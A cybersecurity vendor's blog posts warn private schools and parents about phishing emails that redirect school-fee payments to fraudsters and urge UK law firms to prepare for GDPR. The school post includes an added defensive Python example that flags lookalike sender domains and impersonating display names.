Private schools and parents face a cyber threat. As cybercriminals are always seeking new targets, digital security for education should not be ignored. Organisations receiving large payments, and with poorly secured IT systems, are a treasure trove for hackers. Their latest campaign attacks private schools, with the aim of tricking parents into paying thousands of pounds of school fees into fraudsters’ accounts. Cybersecurity for the education sector needs to be taken seriously.

Digital Security for Education

Unfortunately, many private schools lack adequate digital security. Cybercriminals are using phishing attacks to compromise school email systems in order to obtain parents’ data and contact details. A common tactic involves emailing parents to explain that the school’s payment details have changed and issuing a new invoice with the fraudsters’ own bank details. Parents who reply to the email for confirmation risk emailing the hackers instead.

It has been reported that one parent with three children at an independent school paid £70,000 to hackers after being offered a 10 per cent “early bird” discount.

“These emails can seem very real,” says Colin Tankard, Digital Pathways’ Managing Director. “And, while the private school sector seems to be the latest target of these fraudsters, they are certainly not the first, nor will they be the last.

“Always hover your cursor over the URL and check that the address is correct.  Sometimes it may differ by one digit or letter, so vigilance is key”, he adds.
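The check above, looking for an address that differs by one digit or letter, is something a mail gateway or a parent’s mail client can do mechanically before a human ever sees the message. The following is an added example and not Digital Pathways’ code or product; the trusted school domain, the organisation name and the sample sender headers are constructed for the example. It classifies a `From:` header as trusted, a lookalike of the trusted domain (one edit away, or identical once look-alike characters such as `1`/`l` and `0`/`o` are normalised), a display name that claims to be the school while coming from elsewhere, or simply untrusted.

```python
import re

# Hypothetical trusted school domain and organisation name used for this example.
TRUSTED_DOMAINS = {"stmarys-school.example"}
ORGANISATION_NAMES = {"st marys school"}

# Characters that imitate others in many fonts, mapped to what they imitate.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def normalise_domain(domain):
    """Fold common look-alike characters so 'schoo1' and 'school' compare equal."""
    folded = domain.lower().translate(HOMOGLYPHS)
    return folded.replace("rn", "m").replace("vv", "w")


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute or swap adjacent characters."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def split_header(header):
    """Split 'Display Name <user@domain>' into (name, address); a bare address has no name."""
    m = re.match(r'^\s*"?([^"<]*?)"?\s*<([^>]+)>\s*$', header)
    if m:
        return m.group(1).strip(), m.group(2).strip().lower()
    return "", header.strip().lower()


def classify_sender(header):
    """Classify a From: header against the trusted domain and organisation name."""
    name, addr = split_header(header)
    if "@" not in addr:
        return "malformed"
    domain = addr.rsplit("@", 1)[1]
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    for trusted in TRUSTED_DOMAINS:
        if normalise_domain(domain) == normalise_domain(trusted) or osa_distance(domain, trusted) <= 1:
            return "lookalike domain"
    plain_name = re.sub(r"\s+", " ", re.sub(r"[^a-z ]", "", name.lower()))
    if any(org in plain_name for org in ORGANISATION_NAMES):
        return "impersonating display name"
    return "untrusted"


if __name__ == "__main__":
    # Constructed sample headers: one genuine, two lookalikes, one name-only impersonation, one ordinary.
    for header in [
        "Bursar <bursar@stmarys-school.example>",
        "Bursar <bursar@stmarys-schoo1.example>",
        "Bursar <bursar@stmary-school.example>",
        "St Marys School Finance <payments@mail-relay.example>",
        "parent@homemail.example",
    ]:
        print(f"{classify_sender(header):28} {header}")
```

A "lookalike domain" or "impersonating display name" result is a reason to stop and verify, not a proof of fraud: the normalisation deliberately errs towards flagging, and the final decision about a changed invoice or bank account still belongs to a person who confirms it with the school through a channel that does not come from the email itself.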

Schools and parents who find themselves the victim of these attacks are unlikely to recover their money. Payment by bank transfer is not protected, and few schools have taken out cyber insurance. For the few that have, only 38 percent of policies cover this type of crime.

Cybersecurity Training

Staff need to receive ongoing training to help them identify phishing scams that enable hackers to gain access to their systems.

Also, schools need to act quickly to ensure they are protecting the personal data they store and process. On 25th May 2018, the General Data Protection Regulation (GDPR) will replace the Data Protection Act. Failure to protect their systems from unauthorised access could see independent schools hit with colossal fines.

Compliance requires preparation, including auditing what information is held, and where, assessing threats, training staff, and updating policies and systems.

In light of the current email scam, independent schools should use a GDPR-compliant secure email service. Utilising end-to-end encryption, messages are protected from unauthorised access and e-mails rendered trusted and binding. Hackers are unable to decrypt the information being passed between the organisation and individuals. This restores confidence in email communications, knowing messages have come from a trusted source and are being sent to the intended recipient.

Our secure email service turns regular email into secure electronic communication. It is convenient, integrating with existing email solutions, and makes regular email compliant with GDPR.

With schools holding large amounts of sensitive and personal data, independent school fees attracting cybercriminals, and the imminent arrival of GDPR, it is essential schools invest in their digital security to protect themselves, their students and parents.

For advice and support with protecting your organisation from cybersecurity threats, contact us on 0844 586 0040 or email intouch@digitalpathways.co.uk.

General Data Protection Regulation

GDPR: Is Your Law Firm in the 75%?

Cybersecurity for Your Law Firm

In November 2017, it was reported that 75% of UK law firms aren’t ready for the General Data Protection Regulation (GDPR). With less than three months to go until the compliance deadline of 25th May 2018, it is more important than ever for law firms to be prepared.

The legal sector is already highly regulated, with firms needing to comply with money laundering obligations, for instance. However, we have encountered some firms who believe this degree of regulation means they will already comply with GDPR. This isn’t true. Compliance with GDPR requires its own preparation, auditing, and changes to systems and policies surrounding the processing and storing of personal data.

General Data Protection Regulation (GDPR)

GDPR places greater responsibility on organisations to review third-party agreements for compliance too. Depending on your current processes and use of third parties, this could take significant time and resource.

As a firm, you must decide if you need to appoint a Data Protection Officer, based on criteria specified in the incoming legislation, as well as reviewing (or in some cases, implementing) your data protection policy, data breach notification procedure, subject access request forms and procedures, data protection impact assessments, and consent forms.

If you aren’t sure where to begin, the Law Society is collating guidance and support to help law firms prepare for GDPR.

Cybersecurity remains as important under GDPR as it is under the current data protection framework. The legal sector is an especially attractive target for cybercriminals seeking the sensitive data and significant funds held by law firms. Alarmingly, 62% of law firms reportedly suffered a cybersecurity incident last year.

Here are three ways you can protect your law firm from cybersecurity attacks:

Cyber Training for your Law Firm staff

Every member of your firm is responsible for protecting your data. This is why it is essential to educate your staff through cybersecurity training. From spotting attempted social engineering attacks to understanding the risk posed by an unidentified USB device, being able to identify risks and threats could prevent a successful attack against your firm.

Secure email

Standard email is not a secure option for law firms. Unencrypted emails travel through servers located all over the world. Anyone who intercepts these communications will have access to the information being sent.

Law firms are especially likely to send emails containing sensitive information. Secure email is essential for the legal sector and has come a very long way, offering both security and convenience. Our trusted partner provides an encrypted email service that protects messages from unauthorised access and renders e-mail trusted and binding, making ordinary email compliant with GDPR.

Secure file sharing for your Law Firm

The legal sector relies on document sharing. A secure file sharing system will protect your important documents and the sensitive data you hold. Cloud services such as Dropbox and OneDrive do not encrypt your documents, leaving you vulnerable to an attack on the cloud storage provider or access requests by government authorities. Through our partnerships, we also offer a secure file sharing solution. Utilising end-to-end encryption and anonymised key management via a trusted third party, all data is securely stored within the UK.

Would you like to discuss GDPR or cybersecurity for your law firm? We’d be happy to help. Contact us on 0844 586 0040 or email intouch@digitalpathways.co.uk.


Client Data: Is Your Law Firm the Weakest Point in the Cyber Security Chain?

Financial Fraud is big business for cybercriminals

During 2016, 73 out of 100 top UK law firms were targeted by hackers. Meanwhile, many smaller firms mistakenly believe they are too small or niche to attract the interest of cybercriminals. As a law firm, the information you store and process is highly valuable. By aggressively targeting law firms, hackers seek to steal sensitive information, such as commercial secrets, intellectual property, personal information, details of mergers and acquisitions, and market strategies. This is why you are, and will continue to be, the target of cyber-attacks and potential financial fraud.

Cybersecurity issues for law firms

Unfortunately, several high-profile breaches indicate that the legal sector has a cybersecurity problem. This is something cybercriminals are acutely aware of and seek to exploit. The issue is global, affecting firms all over the world. The revelation of the Panama Papers, for instance, was the result of a single cyber attack against Mossack Fonseca, a small Panamanian law firm. It is the largest data breach in history.